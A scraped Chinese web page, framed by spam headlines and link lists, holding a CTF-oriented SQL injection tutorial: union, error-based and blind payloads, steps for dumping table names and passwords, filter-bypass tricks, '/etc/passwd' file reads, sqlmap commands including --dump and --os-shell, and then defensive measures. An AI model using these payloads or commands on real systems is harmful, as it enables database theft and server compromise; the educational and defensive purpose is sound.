当前位置: 首页 > news >正文

黄岩区信誉好高端网站设计课程网站建设所用技术

黄岩区信誉好高端网站设计,课程网站建设所用技术,建设厅网站更改登陆密码,一站式服务建站文章目录 一、什么是SQL注入?二、常见SQL注入类型三、手动注入步骤(以CTF题目为例)四、CTF实战技巧五、自动化工具:SQLMap六、防御措施七、CTF例题八、资源推荐 一、什么是SQL注入? SQL注入是一种通过用户输入构造恶意…

文章目录

    • 一、什么是SQL注入?
    • 二、常见SQL注入类型
    • 三、手动注入步骤(以CTF题目为例)
    • 四、CTF实战技巧
    • 五、自动化工具:SQLMap
    • 六、防御措施
    • 七、CTF例题
    • 八、资源推荐

一、什么是SQL注入?

SQL注入是一种通过用户输入构造恶意SQL语句,干扰后端数据库查询逻辑的攻击方式。攻击者可通过注入获取敏感数据、篡改数据库或执行系统命令。


二、常见SQL注入类型

  1. 联合查询注入(Union-Based)
    利用UNION SELECT拼接查询结果,直接回显数据。

    ' UNION SELECT username, password FROM users--

  2. 报错注入(Error-Based)
    通过触发数据库报错泄露信息(如MySQL的updatexmlextractvalue)。

    ' AND updatexml(1, concat(0x7e, (SELECT user())), 1)--

  3. 布尔盲注(Boolean-Based Blind)
    通过页面返回的真假状态推断数据(如返回内容差异或HTTP状态码)。

    ' AND (SELECT SUBSTR(password,1,1) FROM users WHERE id=1)='a'--

  4. 时间盲注(Time-Based Blind)
    通过延时响应判断条件是否成立(如MySQL的sleep())。

    ' AND IF(1=1, SLEEP(5), 0)--


三、手动注入步骤(以CTF题目为例)

  1. 检测注入点

    • 输入单引号'触发数据库错误(如You have an error in your SQL syntax)。

    • 测试逻辑条件:

      id=1' AND 1=1-- (页面正常) id=1' AND 1=2-- (页面异常)

  2. 确定字段数(ORDER BY)

    ' ORDER BY 3-- (无报错) ' ORDER BY 4-- (报错→字段数为3)

  3. 联合查询获取数据

    ' UNION SELECT 1,2,3-- (确定回显位) ' UNION SELECT database(), user(), version()--

  4. 提取表名与列名

    ' UNION SELECT 1, group_concat(table_name), 3 FROM information_schema.tables WHERE table_schema=database()-- ' UNION SELECT 1, group_concat(column_name), 3 FROM information_schema.columns WHERE table_name='users'--

  5. 获取敏感数据

    ' UNION SELECT 1, username, password FROM users--


四、CTF实战技巧

  1. 绕过过滤

    • 大小写绕过UnIoN SeLeCt(部分过滤器不区分大小写)。
    • 注释符-- (空格)、#/*...*/
    • 编码绕过:URL编码(%27代替')、十六进制(0x...)。
    • 空格绕过:用/**/+代替空格(如UNION/**/SELECT)。
  2. 利用字符串拼接

    • MySQL:'||'1'='1'' OR '1'='1
    • SQLite:'||1=1--
  3. 利用数据库特性

    • MySQLLOAD_FILE('/etc/passwd')读取文件。
    • PostgreSQLpg_read_file('/etc/passwd')
    • SQLitesqlite_version()获取版本。

五、自动化工具:SQLMap

  1. 基本用法

    sqlmap -u "http://target.com/page?id=1" --dbs # 获取所有数据库名 sqlmap -u "http://target.com/page?id=1" -D dbname --tables # 获取表名 sqlmap -u "http://target.com/page?id=1" -D dbname -T users --dump # 导出数据

  2. 高级参数

    • --level=3:提高检测等级(包含Cookie注入)。
    • --risk=3:允许高风险操作(如文件写入)。
    • --os-shell:尝试获取系统Shell(需高权限)。

六、防御措施

  1. 参数化查询(预编译)

    Python

    # Python示例(使用SQLAlchemy) result = db.session.execute('SELECT * FROM users WHERE id = :id', {'id': user_id})

  2. 输入过滤

    • 过滤特殊字符(' " ; --)。
    • 限制输入类型(如数字类型强制转换为整数)。
  3. 最小权限原则

    • 数据库用户仅授予必要权限(禁止FILEEXECUTE等)。

七、CTF例题

  1. 题目:登录页面存在SQL注入,获取管理员密码。

    SQL

    ' OR 1=1 -- ' UNION SELECT null, password FROM users WHERE username='admin'--

  2. 题目:过滤了空格和UNION,利用盲注获取数据。

    SQL

    '||(SELECT CASE WHEN (SUBSTR(password,1,1)='a') THEN SLEEP(5) ELSE 0 END FROM users)#


八、资源推荐

  • 练习平台
    • PortSwigger SQLi Labs(https://portswigger.net/web-security/sql-injection)
    • SQLi Labs(GitHub开源靶场)
  • 深入阅读
    • 《SQL注入攻击与防御(第2版)》
    • OWASP SQL Injection Cheat Sheet
http://www.yayakq.cn/news/753134/

相关文章:

  • 人力资源网站建设方案网站制作定制
  • wordpress要评论了才能看到内容深圳辰硕网站优化
  • 英文网站seo如何做没有网站做cpa怎么赚钱
  • 网页制作首页windows优化大师要钱
  • 苏州木渎做网站在线阅读小说网站怎么建设
  • 网站维护协议书公司网站后台是什么
  • 摄影公司网站开发厦门安能建设品牌网站建设
  • 浙江建站湖南建筑公司网站
  • 深圳美容网站建有哪些好的响应式网站
  • app制作网站制作完建设局工作怎么样
  • 网站建站主机小学生网站制作
  • 网站建设技术实现难点网站建设人员分工表
  • wordpress提醒用法抖音seo软件工具
  • 网站群建设方案6网站设计建设步骤
  • 赣州网站建设策划wordpress输入qq评论
  • ai一键生成短视频免费版seo优化需要做什么
  • 十堰百度网站建设网站建设58
  • 网站推广见效快的方法网站服务器端口如何做防护
  • 网站后台不显示vue开发wordpress
  • 互联网保险发展现状上海网络seo
  • 做互助盘网站社区团购app
  • wordpress忽略更新深圳推广软件十年乐云seo
  • 找人做网站需要先了解哪些要点在线建设网站 源代码
  • 营销型网站的推广方法自己做衣服的网站
  • 免费婚纱网站模板做地税电子签章的网站
  • wordpress回收站优秀的网站建设
  • 如何做网站的二级页面沈丘网站建设
  • 微信企业网站建筑施工安全员c证查询
  • 网站模仿侵权南京软件定制
  • 医院网站建设招标说明现在外贸做那个网站好